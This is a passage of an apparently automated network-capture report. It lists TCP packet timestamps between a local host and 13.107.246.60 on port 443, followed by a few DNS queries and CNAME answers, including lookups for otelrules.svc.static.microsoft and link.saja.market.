                                          Mar 17, 2025 09:29:37.994415045 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:37.995287895 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.995307922 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.995345116 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:37.995352030 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.995362043 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:37.996257067 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.996277094 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.996314049 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:37.996321917 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.996334076 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:37.996361017 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:37.998497963 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.077922106 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.077986002 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.078048944 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.078080893 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.078100920 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.078113079 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.078115940 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.078178883 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.078180075 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.078241110 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.078298092 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.078306913 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.078421116 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.078463078 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.078478098 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.078497887 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.078527927 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.078551054 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.078814983 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.078860998 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.078874111 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.078881979 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.078921080 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.082547903 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.082591057 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.082645893 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.082665920 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.082679987 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.082865953 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.082925081 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.082940102 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.082988977 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.083004951 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.083039045 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.083348036 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.083386898 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.083401918 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.083411932 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.083435059 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.083451986 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.083900928 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.083951950 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.083970070 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.083980083 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.084000111 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.084016085 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.164099932 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.164180994 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.164282084 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.164324045 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.164340973 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.164370060 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.164419889 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.164459944 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.164489031 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.164496899 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.164525986 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.164554119 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.164601088 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.164654970 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.164658070 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.164684057 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.164716959 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.164727926 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.164891005 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.164931059 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.164953947 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.164963007 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.164979935 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.164994001 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.165071964 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.165113926 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.165147066 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.165158987 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.165179014 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.165199041 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.165271997 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.165312052 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.165328979 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.165337086 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.165349007 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.165369034 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.165386915 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.165716887 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.165760040 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.165776014 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.165785074 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.165813923 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.165827036 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.165899038 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.165945053 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.165957928 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.165970087 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.166002989 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.166013002 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.166908026 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.250370979 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.250401974 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.250449896 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.250458956 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.250492096 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.250514984 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.250546932 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.250633955 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.250654936 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.250689030 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.250703096 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.250714064 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.250942945 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.250965118 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.250994921 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.251003027 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.251025915 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.251380920 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.251399040 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.251444101 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.251451969 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.251461983 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.251568079 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.251589060 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.251617908 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.251626015 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.251636028 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.251739025 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.251754045 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.251784086 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.251791000 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.251805067 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.252098083 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.252123117 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.252177954 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.252185106 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.254992008 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.338964939 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.338998079 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.339031935 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.339061975 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.339077950 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.339096069 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.339107990 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.339134932 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.339159966 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.339165926 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.339210033 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.339210033 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.339462042 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.339483023 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.339515924 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.339523077 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.339550018 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.339560032 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.339675903 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.339693069 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.339721918 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.339729071 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.339749098 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.339767933 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.339993000 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.340017080 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.340055943 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.340061903 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.340075016 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.340090036 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.340249062 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.340270996 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.340456963 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.340456963 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.340468884 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.340506077 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.340507030 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.340522051 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.340543032 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.340553045 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.340559959 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.340584040 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.340600014 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.340833902 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.340856075 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.340889931 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.340897083 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.340909004 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.340925932 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.342297077 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.426780939 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.426811934 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.426866055 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.426877022 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.426891088 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.426894903 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.426914930 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.426918030 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.426949024 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.426964998 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.426978111 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.427089930 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.427958012 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.427978992 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.428049088 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.428057909 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.428092003 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.428105116 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.428131104 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.428153992 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.428160906 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.428188086 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.428205967 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.428951025 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.428978920 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.429008961 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.429014921 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.429040909 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.429054022 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.429531097 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.429552078 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.429591894 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.429598093 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.429622889 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.429630995 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.430171967 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.430181026 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.430246115 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.430253029 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.430476904 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.431011915 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.431031942 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.431155920 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.431163073 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.431210041 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.513130903 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.513153076 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.513211012 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.513242960 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.513257980 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.513344049 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.513427973 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.513451099 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.513482094 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.513492107 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.513509035 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.513526917 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.514265060 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.514288902 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.514324903 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.514333963 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.514363050 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.514383078 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.514463902 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.514481068 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.514552116 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.514552116 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.514569998 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.514643908 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.515187979 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.515207052 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.515243053 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.515250921 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.515264988 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.515300035 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.515892029 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.515913963 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.515955925 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.515969992 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.515995026 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.516015053 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.516015053 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.516705036 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.516726971 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.516767025 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.516769886 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.516781092 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.516803980 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.516819000 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.516828060 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.516860962 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.516872883 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.516899109 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.517016888 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.517040968 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:38.517050982 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:38.517056942 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:42.138468981 CET49765443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:42.138597012 CET4434976513.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:42.138900995 CET49765443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:42.139230013 CET49765443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:42.139261007 CET4434976513.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:42.140228033 CET49766443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:42.140280962 CET4434976613.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:42.140358925 CET49766443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:42.140495062 CET49766443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:42.140511036 CET4434976613.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:42.776760101 CET4434976513.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:42.777209997 CET4434976613.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:42.777525902 CET49765443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:42.777559042 CET4434976513.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:42.778107882 CET49766443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:42.778140068 CET4434976613.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:42.779015064 CET49766443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:42.779026031 CET4434976613.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:42.779361963 CET49765443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:42.779382944 CET4434976513.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:42.878568888 CET4434976513.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:42.878637075 CET4434976513.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:42.878684998 CET49765443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:42.879031897 CET49765443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:42.879050970 CET4434976513.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:42.879065037 CET49765443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:42.879071951 CET4434976513.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:42.880276918 CET4434976613.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:42.880300045 CET4434976613.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:42.880358934 CET49766443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:42.880367041 CET4434976613.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:42.880418062 CET49766443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:42.880563021 CET49766443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:42.880578041 CET4434976613.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:42.880595922 CET49766443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:42.880600929 CET4434976613.107.246.60192.168.2.12
                                          TimestampSource PortDest PortSource IPDest IP
                                          Mar 17, 2025 09:29:01.560025930 CET5123953192.168.2.121.1.1.1
                                          Mar 17, 2025 09:29:01.568686962 CET53512391.1.1.1192.168.2.12
                                          Mar 17, 2025 09:29:27.760652065 CET6245053192.168.2.121.1.1.1
                                          Mar 17, 2025 09:29:27.787823915 CET53624501.1.1.1192.168.2.12
                                          Mar 17, 2025 09:29:36.903357983 CET5973653192.168.2.121.1.1.1
                                          Mar 17, 2025 09:29:36.911876917 CET53597361.1.1.1192.168.2.12

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Mar 17, 2025 09:29:01.560025930 CET192.168.2.121.1.1.10xb44dStandard query (0)otelrules.svc.static.microsoftA (IP address)IN (0x0001)false
                                          Mar 17, 2025 09:29:27.760652065 CET192.168.2.121.1.1.10x68b6Standard query (0)link.saja.marketA (IP address)IN (0x0001)false
                                          Mar 17, 2025 09:29:36.903357983 CET192.168.2.121.1.1.10xda5cStandard query (0)otelrules.svc.static.microsoftA (IP address)IN (0x0001)false

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Mar 17, 2025 09:28:31.436662912 CET1.1.1.1192.168.2.120x2310No error (0)ecs-office.s-0005.dual-s-msedge.netshed.s-0005.dual-s-dc-msedge.netCNAME (Canonical name)IN (0x0001)false
                                          Mar 17, 2025 09:28:31.436662912 CET1.1.1.1192.168.2.120x2310No error (0)shed.s-0005.dual-s-dc-msedge.nets-0005.dual-s-dc-msedge.netCNAME (Canonical name)IN (0x0001)false
